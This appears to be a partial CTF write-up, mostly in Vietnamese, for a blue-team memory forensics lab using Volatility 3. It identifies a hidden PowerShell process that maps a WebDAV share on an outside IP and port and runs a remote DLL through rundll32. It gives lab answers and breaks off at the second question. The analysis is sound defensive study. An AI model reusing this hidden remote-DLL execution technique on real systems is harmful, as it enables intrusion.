Scenario

You are a forensic investigator at a financial institution, and your SIEM flagged unusual activity on a workstation with access to sensitive financial data. Suspecting a breach, you received a memory dump from the compromised machine. Your task is to analyze the memory for signs of compromise, trace the anomaly's origin, and assess its scope to contain the incident effectively.

Tactics: Defense Evasion, Discovery

Tool: Volatility 3

Link Download: https://cyberdefenders.org/blueteam-ctf-challenges/reveal/

Lab Tasks

Q1: Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?

Sửa dụng lệnh

sudo vol3 -f 192-Reveal.dmp windows.pstree 

Ta thu được kết quả

Dạo quanh một vòng và kiểm tra các tiến trình cha-con phát hiện ở gần cuối xuất hiện lệnh thực thi với powershell.

Ta có thể thấy được hai tiến trình độc hại là powershell.exe và net.exe. Chi tiết

• Ẩn cửa sổ PowerShell bằng cách sử dụng tùy chọn windowstyle hidden. Điều này giúp lệnh chạy ngầm mà không hiện giao diện lên.
• Tạo kết nối mạng sử dụng net use:
  • net use được dùng để tạo một kết nối mạng đến một thư mục chia sẻ từ xa.
  • \\\\45.9.74.32@8888\\davwwwroot\\: Đây là địa chỉ của máy chủ từ xa, có thể là một server WebDAV chạy trên cổng không chuẩn (8888).
  • Đây là cách kết nối tới tài nguyên chia sẻ qua giao thức WebDAV.
• Chạy DLL từ xa với rundll32:
  • rundll32 là một công cụ hợp pháp của Windows được sử dụng để gọi và thực thi các hàm cụ thể từ các thư viện DLL.
  • \\\\45.9.74.32@8888\\davwwwroot\\3435.dll,entry:
    • 3435.dll là một tệp DLL được tải từ máy chủ từ xa.

Đáp án: powershell.exe

Q2: Knowing the parent process ID (PPID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?

Ta có thể dễ dàng xác định được PPID